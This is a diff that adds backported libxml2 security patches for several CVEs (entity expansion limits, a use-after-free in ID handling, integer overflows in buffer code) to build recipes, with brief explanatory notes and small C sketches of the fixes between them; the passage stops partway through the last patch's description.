+Subject: [PATCH] Patch for security issue CVE-2021-3541
+
+This is related to parameter entity expansion, following the line of
+the billion laughs attack. Somehow in that path the counting of
+parameters was missed, and the normal algorithm based on entity
+"density" was useless.
+
+Upstream-Status: Backport
+[https://gitlab.gnome.org/GNOME/libxml2/-/commit/8598060bacada41a0eb09d95c97744ff4e428f8e]
+CVE: CVE-2021-3541
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+
+---
+ parser.c | 26 ++++++++++++++++++++++++++
+ 1 file changed, 26 insertions(+)
+
+diff --git a/parser.c b/parser.c
+index f5e5e169..c9312fa4 100644
+--- a/parser.c
++++ b/parser.c
+@@ -140,6 +140,7 @@ xmlParserEntityCheck(xmlParserCtxtPtr ctxt, size_t size,
+ xmlEntityPtr ent, size_t replacement)
+ {
+ size_t consumed = 0;
++ int i;
+
+ if ((ctxt == NULL) || (ctxt->options & XML_PARSE_HUGE))
+ return (0);
+@@ -177,6 +178,28 @@ xmlParserEntityCheck(xmlParserCtxtPtr ctxt, size_t size,
+ rep = NULL;
+ }
+ }
++
++ /*
++ * Prevent entity exponential check, not just replacement while
++ * parsing the DTD
++ * The check is potentially costly so do that only once in a thousand
++ */
++ if ((ctxt->instate == XML_PARSER_DTD) && (ctxt->nbentities > 10000) &&
++ (ctxt->nbentities % 1024 == 0)) {
++ for (i = 0;i < ctxt->inputNr;i++) {
++ consumed += ctxt->inputTab[i]->consumed +
++ (ctxt->inputTab[i]->cur - ctxt->inputTab[i]->base);
++ }
++ if (ctxt->nbentities > consumed * XML_PARSER_NON_LINEAR) {
++ xmlFatalErr(ctxt, XML_ERR_ENTITY_LOOP, NULL);
++ ctxt->instate = XML_PARSER_EOF;
++ return (1);
++ }
++ consumed = 0;
++ }
++
++
++
+ if (replacement != 0) {
+ if (replacement < XML_MAX_TEXT_LENGTH)
+ return(0);
+@@ -7963,6 +7986,9 @@ xmlParsePEReference(xmlParserCtxtPtr ctxt)
+ xmlChar start[4];
+ xmlCharEncoding enc;
+
++ if (xmlParserEntityCheck(ctxt, 0, entity, 0))
++ return;
++
+ if ((entity->etype == XML_EXTERNAL_PARAMETER_ENTITY) &&
+ ((ctxt->options & XML_PARSE_NOENT) == 0) &&
+ ((ctxt->options & XML_PARSE_DTDVALID) == 0) &&
+--
+GitLab
+
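CVE-2021-3541.patch extends the existing heuristic: once a large number of entity references has been seen while parsing the DTD, the parser compares that count against the raw input actually consumed and aborts when expansion grows non-linearly, running the check only every so often because it is costly. A tiny standalone illustration of that budget idea (invented names and constants, not the libxml2 heuristic itself):

#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

#define EXPANSION_FACTOR 10u     /* allowed expansions per consumed byte */
#define CHECK_THRESHOLD  10000u  /* below this, never bother checking    */
#define CHECK_INTERVAL   1024u   /* amortize the (costly) check          */

/* Return true if entity expansion looks non-linear relative to the number
 * of input bytes consumed so far (a "billion laughs" guard). */
static bool expansion_exceeds_budget(size_t nb_entities, size_t consumed_bytes)
{
    if (nb_entities <= CHECK_THRESHOLD)
        return false;
    if (nb_entities % CHECK_INTERVAL != 0)
        return false;
    if (consumed_bytes > SIZE_MAX / EXPANSION_FACTOR)
        return false;            /* product would overflow: clearly linear */
    return nb_entities > consumed_bytes * EXPANSION_FACTOR;
}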
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2022-23308-fix-regression.patch b/meta/recipes-core/libxml/libxml2/CVE-2022-23308-fix-regression.patch
new file mode 100644
index 0000000000..7fc243eec1
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2022-23308-fix-regression.patch
@@ -0,0 +1,98 @@
+From 646fe48d1c8a74310c409ddf81fe7df6700052af Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Tue, 22 Feb 2022 11:51:08 +0100
+Subject: [PATCH] Fix --without-valid build
+
+Regressed in commit 652dd12a.
+---
+ valid.c | 58 ++++++++++++++++++++++++++++-----------------------------
+ 1 file changed, 29 insertions(+), 29 deletions(-)
+---
+
+From https://github.com/GNOME/libxml2.git
+ commit 646fe48d1c8a74310c409ddf81fe7df6700052af
+
+CVE: CVE-2022-23308
+Upstream-Status: Backport
+
+Signed-off-by: Ralph Siemsen <ralph.siemsen@linaro.org>
+
+diff --git a/valid.c b/valid.c
+index 8e596f1d..9684683a 100644
+--- a/valid.c
++++ b/valid.c
+@@ -479,35 +479,6 @@ nodeVPop(xmlValidCtxtPtr ctxt)
+ return (ret);
+ }
+
+-/**
+- * xmlValidNormalizeString:
+- * @str: a string
+- *
+- * Normalize a string in-place.
+- */
+-static void
+-xmlValidNormalizeString(xmlChar *str) {
+- xmlChar *dst;
+- const xmlChar *src;
+-
+- if (str == NULL)
+- return;
+- src = str;
+- dst = str;
+-
+- while (*src == 0x20) src++;
+- while (*src != 0) {
+- if (*src == 0x20) {
+- while (*src == 0x20) src++;
+- if (*src != 0)
+- *dst++ = 0x20;
+- } else {
+- *dst++ = *src++;
+- }
+- }
+- *dst = 0;
+-}
+-
+ #ifdef DEBUG_VALID_ALGO
+ static void
+ xmlValidPrintNode(xmlNodePtr cur) {
+@@ -2636,6 +2607,35 @@ xmlDumpNotationTable(xmlBufferPtr buf, xmlNotationTablePtr table) {
+ (xmlDictOwns(dict, (const xmlChar *)(str)) == 0))) \
+ xmlFree((char *)(str));
+
++/**
++ * xmlValidNormalizeString:
++ * @str: a string
++ *
++ * Normalize a string in-place.
++ */
++static void
++xmlValidNormalizeString(xmlChar *str) {
++ xmlChar *dst;
++ const xmlChar *src;
++
++ if (str == NULL)
++ return;
++ src = str;
++ dst = str;
++
++ while (*src == 0x20) src++;
++ while (*src != 0) {
++ if (*src == 0x20) {
++ while (*src == 0x20) src++;
++ if (*src != 0)
++ *dst++ = 0x20;
++ } else {
++ *dst++ = *src++;
++ }
++ }
++ *dst = 0;
++}
++
+ static int
+ xmlIsStreaming(xmlValidCtxtPtr ctxt) {
+ xmlParserCtxtPtr pctxt;
+--
+2.35.1
+
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2022-23308.patch b/meta/recipes-core/libxml/libxml2/CVE-2022-23308.patch
new file mode 100644
index 0000000000..bf5604e81a
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2022-23308.patch
@@ -0,0 +1,204 @@
+From 8b66850de350f0fcd786ae776a65ba15a5999e50 Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Tue, 8 Feb 2022 03:29:24 +0100
+Subject: [PATCH] Use-after-free of ID and IDREF attributes
+
+If a document is parsed with XML_PARSE_DTDVALID and without
+XML_PARSE_NOENT, the value of ID attributes has to be normalized after
+potentially expanding entities in xmlRemoveID. Otherwise, later calls
+to xmlGetID can return a pointer to previously freed memory.
+
+ID attributes which are empty or contain only whitespace after
+entity expansion are affected in a similar way. This is fixed by
+not storing such attributes in the ID table.
+
+The test to detect streaming mode when validating against a DTD was
+broken. In connection with the defects above, this could result in a
+use-after-free when using the xmlReader interface with validation.
+Fix detection of streaming mode to avoid similar issues. (This changes
+the expected result of a test case. But as far as I can tell, using the
+XML reader with XIncludes referencing the root document never worked
+properly, anyway.)
+
+All of these issues can result in denial of service. Using xmlReader
+with validation could result in disclosure of memory via the error
+channel, typically stderr. The security impact of xmlGetID returning
+a pointer to freed memory depends on the application. The typical use
+case of calling xmlGetID on an unmodified document is not affected.
+
+Upstream-Status: Backport
+[https://gitlab.gnome.org/GNOME/libxml2/-/commit/652dd12a858989b14eed4e84e453059cd3ba340e]
+
+The upstream patch 652dd12a858989b14eed4e84e453059cd3ba340e has been modified
+to skip the patch to the testsuite result (result/XInclude/ns1.xml.rdr), as
+this particular test does not exist in v2.9.10 (it was added later).
+
+CVE: CVE-2022-23308
+Signed-off-by: Ralph Siemsen <ralph.siemsen@linaro.org>
+
+---
+ valid.c | 88 +++++++++++++++++++++++++++++++++++----------------------
+ 1 file changed, 55 insertions(+), 33 deletions(-)
+
+diff --git a/valid.c b/valid.c
+index 07963e7..ee75311 100644
+--- a/valid.c
++++ b/valid.c
+@@ -479,6 +479,35 @@ nodeVPop(xmlValidCtxtPtr ctxt)
+ return (ret);
+ }
+
++/**
++ * xmlValidNormalizeString:
++ * @str: a string
++ *
++ * Normalize a string in-place.
++ */
++static void
++xmlValidNormalizeString(xmlChar *str) {
++ xmlChar *dst;
++ const xmlChar *src;
++
++ if (str == NULL)
++ return;
++ src = str;
++ dst = str;
++
++ while (*src == 0x20) src++;
++ while (*src != 0) {
++ if (*src == 0x20) {
++ while (*src == 0x20) src++;
++ if (*src != 0)
++ *dst++ = 0x20;
++ } else {
++ *dst++ = *src++;
++ }
++ }
++ *dst = 0;
++}
++
+ #ifdef DEBUG_VALID_ALGO
+ static void
+ xmlValidPrintNode(xmlNodePtr cur) {
+@@ -2607,6 +2636,24 @@ xmlDumpNotationTable(xmlBufferPtr buf, xmlNotationTablePtr table) {
+ (xmlDictOwns(dict, (const xmlChar *)(str)) == 0))) \
+ xmlFree((char *)(str));
+
++static int
++xmlIsStreaming(xmlValidCtxtPtr ctxt) {
++ xmlParserCtxtPtr pctxt;
++
++ if (ctxt == NULL)
++ return(0);
++ /*
++ * These magic values are also abused to detect whether we're validating
++ * while parsing a document. In this case, userData points to the parser
++ * context.
++ */
++ if ((ctxt->finishDtd != XML_CTXT_FINISH_DTD_0) &&
++ (ctxt->finishDtd != XML_CTXT_FINISH_DTD_1))
++ return(0);
++ pctxt = ctxt->userData;
++ return(pctxt->parseMode == XML_PARSE_READER);
++}
++
+ /**
+ * xmlFreeID:
+ * @not: A id
+@@ -2650,7 +2697,7 @@ xmlAddID(xmlValidCtxtPtr ctxt, xmlDocPtr doc, const xmlChar *value,
+ if (doc == NULL) {
+ return(NULL);
+ }
+- if (value == NULL) {
++ if ((value == NULL) || (value[0] == 0)) {
+ return(NULL);
+ }
+ if (attr == NULL) {
+@@ -2681,7 +2728,7 @@ xmlAddID(xmlValidCtxtPtr ctxt, xmlDocPtr doc, const xmlChar *value,
+ */
+ ret->value = xmlStrdup(value);
+ ret->doc = doc;
+- if ((ctxt != NULL) && (ctxt->vstateNr != 0)) {
++ if (xmlIsStreaming(ctxt)) {
+ /*
+ * Operating in streaming mode, attr is gonna disappear
+ */
+@@ -2820,6 +2867,7 @@ xmlRemoveID(xmlDocPtr doc, xmlAttrPtr attr) {
+ ID = xmlNodeListGetString(doc, attr->children, 1);
+ if (ID == NULL)
+ return(-1);
++ xmlValidNormalizeString(ID);
+
+ id = xmlHashLookup(table, ID);
+ if (id == NULL || id->attr != attr) {
+@@ -3009,7 +3057,7 @@ xmlAddRef(xmlValidCtxtPtr ctxt, xmlDocPtr doc, const xmlChar *value,
+ * fill the structure.
+ */
+ ret->value = xmlStrdup(value);
+- if ((ctxt != NULL) && (ctxt->vstateNr != 0)) {
++ if (xmlIsStreaming(ctxt)) {
+ /*
+ * Operating in streaming mode, attr is gonna disappear
+ */
+@@ -4028,8 +4076,7 @@ xmlValidateAttributeValue2(xmlValidCtxtPtr ctxt, xmlDocPtr doc,
+ xmlChar *
+ xmlValidCtxtNormalizeAttributeValue(xmlValidCtxtPtr ctxt, xmlDocPtr doc,
+ xmlNodePtr elem, const xmlChar *name, const xmlChar *value) {
+- xmlChar *ret, *dst;
+- const xmlChar *src;
++ xmlChar *ret;
+ xmlAttributePtr attrDecl = NULL;
+ int extsubset = 0;
+
+@@ -4070,19 +4117,7 @@ xmlValidCtxtNormalizeAttributeValue(xmlValidCtxtPtr ctxt, xmlDocPtr doc,
+ ret = xmlStrdup(value);
+ if (ret == NULL)
+ return(NULL);
+- src = value;
+- dst = ret;
+- while (*src == 0x20) src++;
+- while (*src != 0) {
+- if (*src == 0x20) {
+- while (*src == 0x20) src++;
+- if (*src != 0)
+- *dst++ = 0x20;
+- } else {
+- *dst++ = *src++;
+- }
+- }
+- *dst = 0;
++ xmlValidNormalizeString(ret);
+ if ((doc->standalone) && (extsubset == 1) && (!xmlStrEqual(value, ret))) {
+ xmlErrValidNode(ctxt, elem, XML_DTD_NOT_STANDALONE,
+ "standalone: %s on %s value had to be normalized based on external subset declaration\n",
+@@ -4114,8 +4149,7 @@ xmlValidCtxtNormalizeAttributeValue(xmlValidCtxtPtr ctxt, xmlDocPtr doc,
+ xmlChar *
+ xmlValidNormalizeAttributeValue(xmlDocPtr doc, xmlNodePtr elem,
+ const xmlChar *name, const xmlChar *value) {
+- xmlChar *ret, *dst;
+- const xmlChar *src;
++ xmlChar *ret;
+ xmlAttributePtr attrDecl = NULL;
+
+ if (doc == NULL) return(NULL);
+@@ -4145,19 +4179,7 @@ xmlValidNormalizeAttributeValue(xmlDocPtr doc, xmlNodePtr elem,
+ ret = xmlStrdup(value);
+ if (ret == NULL)
+ return(NULL);
+- src = value;
+- dst = ret;
+- while (*src == 0x20) src++;
+- while (*src != 0) {
+- if (*src == 0x20) {
+- while (*src == 0x20) src++;
+- if (*src != 0)
+- *dst++ = 0x20;
+- } else {
+- *dst++ = *src++;
+- }
+- }
+- *dst = 0;
++ xmlValidNormalizeString(ret);
+ return(ret);
+ }
+
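The core of CVE-2022-23308.patch is factoring the attribute-value normalization (strip leading/trailing spaces, collapse internal runs) into a single in-place helper so that xmlRemoveID normalizes the looked-up value exactly as it was normalized when stored. Below is a short usage demonstration of an equivalent normalizer, using plain char instead of xmlChar and a hypothetical name:

#include <stdio.h>

/* Collapse runs of spaces to one and strip leading/trailing spaces,
 * rewriting the string in place. */
static void normalize_spaces(char *str)
{
    char *dst;
    const char *src;

    if (str == NULL)
        return;
    src = str;
    dst = str;
    while (*src == ' ')
        src++;
    while (*src != '\0') {
        if (*src == ' ') {
            while (*src == ' ')
                src++;
            if (*src != '\0')
                *dst++ = ' ';
        } else {
            *dst++ = *src++;
        }
    }
    *dst = '\0';
}

int main(void)
{
    char id[] = "  a   b  ";
    normalize_spaces(id);
    printf("[%s]\n", id);   /* prints [a b] */
    return 0;
}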
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2022-29824-dependent.patch b/meta/recipes-core/libxml/libxml2/CVE-2022-29824-dependent.patch
new file mode 100644
index 0000000000..63d613cc21
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2022-29824-dependent.patch
@@ -0,0 +1,53 @@
+From b07251215ef48c70c6e56f7351406c47cfca4d5b Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Fri, 10 Jan 2020 15:55:07 +0100
+Subject: [PATCH] Fix integer overflow in xmlBufferResize
+
+Found by OSS-Fuzz.
+
+CVE: CVE-2022-29824
+
+Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/libxml2/-/commit/b07251215ef48c70c6e56f7351406c47cfca4d5b]
+
+Signed-off-by: Riyaz Ahmed Khan <Riyaz.Khan@kpit.com>
+
+---
+ tree.c | 9 +++++++--
+ 1 file changed, 7 insertions(+), 2 deletions(-)
+
+diff --git a/tree.c b/tree.c
+index 0d7fc98c..f43f6de1 100644
+--- a/tree.c
++++ b/tree.c
+@@ -7424,12 +7424,17 @@ xmlBufferResize(xmlBufferPtr buf, unsigned int size)
+ if (size < buf->size)
+ return 1;
+
++ if (size > UINT_MAX - 10) {
++ xmlTreeErrMemory("growing buffer");
++ return 0;
++ }
++
+ /* figure out new size */
+ switch (buf->alloc){
+ case XML_BUFFER_ALLOC_IO:
+ case XML_BUFFER_ALLOC_DOUBLEIT:
+ /*take care of empty case*/
+- newSize = (buf->size ? buf->size*2 : size + 10);
++ newSize = (buf->size ? buf->size : size + 10);
+ while (size > newSize) {
+ if (newSize > UINT_MAX / 2) {
+ xmlTreeErrMemory("growing buffer");
+@@ -7445,7 +7450,7 @@ xmlBufferResize(xmlBufferPtr buf, unsigned int size)
+ if (buf->use < BASE_BUFFER_SIZE)
+ newSize = size;
+ else {
+- newSize = buf->size * 2;
++ newSize = buf->size;
+ while (size > newSize) {
+ if (newSize > UINT_MAX / 2) {
+ xmlTreeErrMemory("growing buffer");
+--
+GitLab
+
+
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2022-29824.patch b/meta/recipes-core/libxml/libxml2/CVE-2022-29824.patch
new file mode 100644
index 0000000000..ad7b87dbc6
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2022-29824.patch
@@ -0,0 +1,348 @@
+From 2554a2408e09f13652049e5ffb0d26196b02ebab Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Tue, 8 Mar 2022 20:10:02 +0100
+Subject: [PATCH] [CVE-2022-29824] Fix integer overflows in xmlBuf and
+ xmlBuffer
+
+In several places, the code handling string buffers didn't check for
+integer overflow or used wrong types for buffer sizes. This could
+result in out-of-bounds writes or other memory errors when working on
+large, multi-gigabyte buffers.
+
+Thanks to Felix Wilhelm for the report.
+
+CVE: CVE-2022-29824
+
+Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/libxml2/-/commit/2554a2408e09f13652049e5ffb0d26196b02ebab]
+
+Signed-off-by: Riyaz Ahmed Khan <Riyaz.Khan@kpit.com>
+
+---
+ buf.c | 86 +++++++++++++++++++++++-----------------------------------
+ tree.c | 72 ++++++++++++++++++------------------------------
+ 2 files changed, 61 insertions(+), 97 deletions(-)
+
+diff --git a/buf.c b/buf.c
+index 24368d37..40a5ee06 100644
+--- a/buf.c
++++ b/buf.c
+@@ -30,6 +30,10 @@
+ #include <libxml/parserInternals.h> /* for XML_MAX_TEXT_LENGTH */
+ #include "buf.h"
+
++#ifndef SIZE_MAX
++#define SIZE_MAX ((size_t) -1)
++#endif
++
+ #define WITH_BUFFER_COMPAT
+
+ /**
+@@ -156,6 +160,8 @@ xmlBufPtr
+ xmlBufCreateSize(size_t size) {
+ xmlBufPtr ret;
+
++ if (size == SIZE_MAX)
++ return(NULL);
+ ret = (xmlBufPtr) xmlMalloc(sizeof(xmlBuf));
+ if (ret == NULL) {
+ xmlBufMemoryError(NULL, "creating buffer");
+@@ -166,8 +172,8 @@ xmlBufCreateSize(size_t size) {
+ ret->error = 0;
+ ret->buffer = NULL;
+ ret->alloc = xmlBufferAllocScheme;
+- ret->size = (size ? size+2 : 0); /* +1 for ending null */
+- ret->compat_size = (int) ret->size;
++ ret->size = (size ? size + 1 : 0); /* +1 for ending null */
++ ret->compat_size = (ret->size > INT_MAX ? INT_MAX : ret->size);
+ if (ret->size){
+ ret->content = (xmlChar *) xmlMallocAtomic(ret->size * sizeof(xmlChar));
+ if (ret->content == NULL) {
+@@ -442,23 +448,17 @@ xmlBufGrowInternal(xmlBufPtr buf, size_t len) {
+ CHECK_COMPAT(buf)
+
+ if (buf->alloc == XML_BUFFER_ALLOC_IMMUTABLE) return(0);
+- if (buf->use + len < buf->size)
++ if (len < buf->size - buf->use)
+ return(buf->size - buf->use);
++ if (len > SIZE_MAX - buf->use)
++ return(0);
+
+- /*
+- * Windows has a BIG problem on realloc timing, so we try to double
+- * the buffer size (if that's enough) (bug 146697)
+- * Apparently BSD too, and it's probably best for linux too
+- * On an embedded system this may be something to change
+- */
+-#if 1
+- if (buf->size > (size_t) len)
+- size = buf->size * 2;
+- else
+- size = buf->use + len + 100;
+-#else
+- size = buf->use + len + 100;
+-#endif
++ if (buf->size > (size_t) len) {
++ size = buf->size > SIZE_MAX / 2 ? SIZE_MAX : buf->size * 2;
++ } else {
++ size = buf->use + len;
++ size = size > SIZE_MAX - 100 ? SIZE_MAX : size + 100;
++ }
+
+ if (buf->alloc == XML_BUFFER_ALLOC_BOUNDED) {
+ /*
+@@ -744,7 +744,7 @@ xmlBufIsEmpty(const xmlBufPtr buf)
+ int
+ xmlBufResize(xmlBufPtr buf, size_t size)
+ {
+- unsigned int newSize;
++ size_t newSize;
+ xmlChar* rebuf = NULL;
+ size_t start_buf;
+
+@@ -772,9 +772,13 @@ xmlBufResize(xmlBufPtr buf, size_t size)
+ case XML_BUFFER_ALLOC_IO:
+ case XML_BUFFER_ALLOC_DOUBLEIT:
+ /*take care of empty case*/
+- newSize = (buf->size ? buf->size*2 : size + 10);
++ if (buf->size == 0) {
++ newSize = (size > SIZE_MAX - 10 ? SIZE_MAX : size + 10);
++ } else {
++ newSize = buf->size;
++ }
+ while (size > newSize) {
+- if (newSize > UINT_MAX / 2) {
++ if (newSize > SIZE_MAX / 2) {
+ xmlBufMemoryError(buf, "growing buffer");
+ return 0;
+ }
+@@ -782,15 +786,15 @@ xmlBufResize(xmlBufPtr buf, size_t size)
+ }
+ break;
+ case XML_BUFFER_ALLOC_EXACT:
+- newSize = size+10;
++ newSize = (size > SIZE_MAX - 10 ? SIZE_MAX : size + 10);
+ break;
+ case XML_BUFFER_ALLOC_HYBRID:
+ if (buf->use < BASE_BUFFER_SIZE)
+ newSize = size;
+ else {
+- newSize = buf->size * 2;
++ newSize = buf->size;
+ while (size > newSize) {
+- if (newSize > UINT_MAX / 2) {
++ if (newSize > SIZE_MAX / 2) {
+ xmlBufMemoryError(buf, "growing buffer");
+ return 0;
+ }
+@@ -800,7 +804,7 @@ xmlBufResize(xmlBufPtr buf, size_t size)
+ break;
+
+ default:
+- newSize = size+10;
++ newSize = (size > SIZE_MAX - 10 ? SIZE_MAX : size + 10);
+ break;
+ }
+
+@@ -866,7 +870,7 @@ xmlBufResize(xmlBufPtr buf, size_t size)
+ */
+ int
+ xmlBufAdd(xmlBufPtr buf, const xmlChar *str, int len) {
+- unsigned int needSize;
++ size_t needSize;
+
+ if ((str == NULL) || (buf == NULL) || (buf->error))
+ return -1;
+@@ -888,8 +892,10 @@ xmlBufAdd(xmlBufPtr buf, const xmlChar *str, int len) {
+ if (len < 0) return -1;
+ if (len == 0) return 0;
+
+- needSize = buf->use + len + 2;
+- if (needSize > buf->size){
++ if ((size_t) len >= buf->size - buf->use) {
++ if ((size_t) len >= SIZE_MAX - buf->use)
++ return(-1);
++ needSize = buf->use + len + 1;
+ if (buf->alloc == XML_BUFFER_ALLOC_BOUNDED) {
+ /*
+ * Used to provide parsing limits
+@@ -1025,31 +1031,7 @@ xmlBufCat(xmlBufPtr buf, const xmlChar *str) {
+ */
+ int
+ xmlBufCCat(xmlBufPtr buf, const char *str) {
+- const char *cur;
+-
+- if ((buf == NULL) || (buf->error))
+- return(-1);
+- CHECK_COMPAT(buf)
+- if (buf->alloc == XML_BUFFER_ALLOC_IMMUTABLE) return -1;
+- if (str == NULL) {
+-#ifdef DEBUG_BUFFER
+- xmlGenericError(xmlGenericErrorContext,
+- "xmlBufCCat: str == NULL\n");
+-#endif
+- return -1;
+- }
+- for (cur = str;*cur != 0;cur++) {
+- if (buf->use + 10 >= buf->size) {
+- if (!xmlBufResize(buf, buf->use+10)){
+- xmlBufMemoryError(buf, "growing buffer");
+- return XML_ERR_NO_MEMORY;
+- }
+- }
+- buf->content[buf->use++] = *cur;
+- }
+- buf->content[buf->use] = 0;
+- UPDATE_COMPAT(buf)
+- return 0;
++ return xmlBufCat(buf, (const xmlChar *) str);
+ }
+
+ /**
+diff --git a/tree.c b/tree.c
+index 9d94aa42..86afb7d6 100644
+--- a/tree.c
++++ b/tree.c
+@@ -7104,6 +7104,8 @@ xmlBufferPtr
+ xmlBufferCreateSize(size_t size) {
+ xmlBufferPtr ret;
+
++ if (size >= UINT_MAX)
++ return(NULL);
+ ret = (xmlBufferPtr) xmlMalloc(sizeof(xmlBuffer));
+ if (ret == NULL) {
+ xmlTreeErrMemory("creating buffer");
+@@ -7111,7 +7113,7 @@ xmlBufferCreateSize(size_t size) {
+ }
+ ret->use = 0;
+ ret->alloc = xmlBufferAllocScheme;
+- ret->size = (size ? size+2 : 0); /* +1 for ending null */
++ ret->size = (size ? size + 1 : 0); /* +1 for ending null */
+ if (ret->size){
+ ret->content = (xmlChar *) xmlMallocAtomic(ret->size * sizeof(xmlChar));
+ if (ret->content == NULL) {
+@@ -7171,6 +7173,8 @@ xmlBufferCreateStatic(void *mem, size_t size) {
+
+ if ((mem == NULL) || (size == 0))
+ return(NULL);
++ if (size > UINT_MAX)
++ return(NULL);
+
+ ret = (xmlBufferPtr) xmlMalloc(sizeof(xmlBuffer));
+ if (ret == NULL) {
+@@ -7318,28 +7322,23 @@ xmlBufferShrink(xmlBufferPtr buf, unsigned int len) {
+ */
+ int
+ xmlBufferGrow(xmlBufferPtr buf, unsigned int len) {
+- int size;
++ unsigned int size;
+ xmlChar *newbuf;
+
+ if (buf == NULL) return(-1);
+
+ if (buf->alloc == XML_BUFFER_ALLOC_IMMUTABLE) return(0);
+- if (len + buf->use < buf->size) return(0);
++ if (len < buf->size - buf->use)
++ return(0);
++ if (len > UINT_MAX - buf->use)
++ return(-1);
+
+- /*
+- * Windows has a BIG problem on realloc timing, so we try to double
+- * the buffer size (if that's enough) (bug 146697)
+- * Apparently BSD too, and it's probably best for linux too
+- * On an embedded system this may be something to change
+- */
+-#if 1
+- if (buf->size > len)
+- size = buf->size * 2;
+- else
+- size = buf->use + len + 100;
+-#else
+- size = buf->use + len + 100;
+-#endif
++ if (buf->size > (size_t) len) {
++ size = buf->size > UINT_MAX / 2 ? UINT_MAX : buf->size * 2;
++ } else {
++ size = buf->use + len;
++ size = size > UINT_MAX - 100 ? UINT_MAX : size + 100;
++ }
+
+ if ((buf->alloc == XML_BUFFER_ALLOC_IO) && (buf->contentIO != NULL)) {
+ size_t start_buf = buf->content - buf->contentIO;
+@@ -7466,7 +7465,10 @@ xmlBufferResize(xmlBufferPtr buf, unsigned int size)
+ case XML_BUFFER_ALLOC_IO:
+ case XML_BUFFER_ALLOC_DOUBLEIT:
+ /*take care of empty case*/
+- newSize = (buf->size ? buf->size : size + 10);
++ if (buf->size == 0)
++ newSize = (size > UINT_MAX - 10 ? UINT_MAX : size + 10);
++ else
++ newSize = buf->size;
+ while (size > newSize) {
+ if (newSize > UINT_MAX / 2) {
+ xmlTreeErrMemory("growing buffer");
+@@ -7476,7 +7478,7 @@ xmlBufferResize(xmlBufferPtr buf, unsigned int size)
+ }
+ break;
+ case XML_BUFFER_ALLOC_EXACT:
+- newSize = size+10;
++            newSize = (size > UINT_MAX - 10 ? UINT_MAX : size + 10);
+ break;
+ case XML_BUFFER_ALLOC_HYBRID:
+ if (buf->use < BASE_BUFFER_SIZE)
+@@ -7494,7 +7496,7 @@ xmlBufferResize(xmlBufferPtr buf, unsigned int size)
+ break;
+
+ default:
+- newSize = size+10;
++            newSize = (size > UINT_MAX - 10 ? UINT_MAX : size + 10);
+ break;
+ }
+
+@@ -7580,8 +7582,10 @@ xmlBufferAdd(xmlBufferPtr buf, const xmlChar *str, int len) {
+ if (len < 0) return -1;
+ if (len == 0) return 0;
+
+- needSize = buf->use + len + 2;
+- if (needSize > buf->size){
++ if ((unsigned) len >= buf->size - buf->use) {
++ if ((unsigned) len >= UINT_MAX - buf->use)
++ return XML_ERR_NO_MEMORY;
++ needSize = buf->use + len + 1;
+ if (!xmlBufferResize(buf, needSize)){
+ xmlTreeErrMemory("growing buffer");
+ return XML_ERR_NO_MEMORY;
+@@ -7694,29 +7698,7 @@ xmlBufferCat(xmlBufferPtr buf, const xmlChar *str) {
+ */
+ int
+ xmlBufferCCat(xmlBufferPtr buf, const char *str) {
+- const char *cur;
+-
+- if (buf == NULL)
+- return(-1);
+- if (buf->alloc == XML_BUFFER_ALLOC_IMMUTABLE) return -1;
+- if (str == NULL) {
+-#ifdef DEBUG_BUFFER
+- xmlGenericError(xmlGenericErrorContext,
+- "xmlBufferCCat: str == NULL\n");
+-#endif
+- return -1;
+- }
+- for (cur = str;*cur != 0;cur++) {
+- if (buf->use + 10 >= buf->size) {
+- if (!xmlBufferResize(buf, buf->use+10)){
+- xmlTreeErrMemory("growing buffer");
+- return XML_ERR_NO_MEMORY;
+- }
+- }
+- buf->content[buf->use++] = *cur;
+- }
+- buf->content[buf->use] = 0;
+- return 0;
++ return xmlBufferCat(buf, (const xmlChar *) str);
+ }
+
+ /**
+--
+GitLab
+
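The recurring pattern in CVE-2022-29824.patch is to test against the type's maximum before any addition or doubling, and to saturate at that maximum, instead of computing a possibly wrapped sum and comparing afterwards. A hedged standalone sketch of that growth policy follows; the names are illustrative, it is size_t-based like the xmlBuf changes, and it assumes the usual use <= size buffer invariant.

#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Pick a new capacity able to hold use + len bytes, doubling when possible
 * and saturating at SIZE_MAX, without ever overflowing the arithmetic.
 * Returns false if the request itself cannot be represented. */
static bool grow_capacity(size_t use, size_t size, size_t len, size_t *out)
{
    size_t new_size;

    if (len < size - use) {            /* already fits (assumes use <= size) */
        *out = size;
        return true;
    }
    if (len > SIZE_MAX - use)          /* use + len would wrap around */
        return false;

    if (size > len)
        new_size = size > SIZE_MAX / 2 ? SIZE_MAX : size * 2;
    else {
        new_size = use + len;
        new_size = new_size > SIZE_MAX - 100 ? SIZE_MAX : new_size + 100;
    }
    *out = new_size;
    return true;
}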
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2022-40303.patch b/meta/recipes-core/libxml/libxml2/CVE-2022-40303.patch
new file mode 100644
index 0000000000..bdb9e9eb7a
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2022-40303.patch
@@ -0,0 +1,623 @@
+From c846986356fc149915a74972bf198abc266bc2c0 Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Thu, 25 Aug 2022 17:43:08 +0200
+Subject: [PATCH] [CVE-2022-40303] Fix integer overflows with XML_PARSE_HUGE
+
+Also impose size limits when XML_PARSE_HUGE is set. Limit size of names
+to XML_MAX_TEXT_LENGTH (10 million bytes) and other content to
+XML_MAX_HUGE_LENGTH (1 billion bytes).
+
+Move some of the length checks to the end of the respective loop to make
+them strict.
+
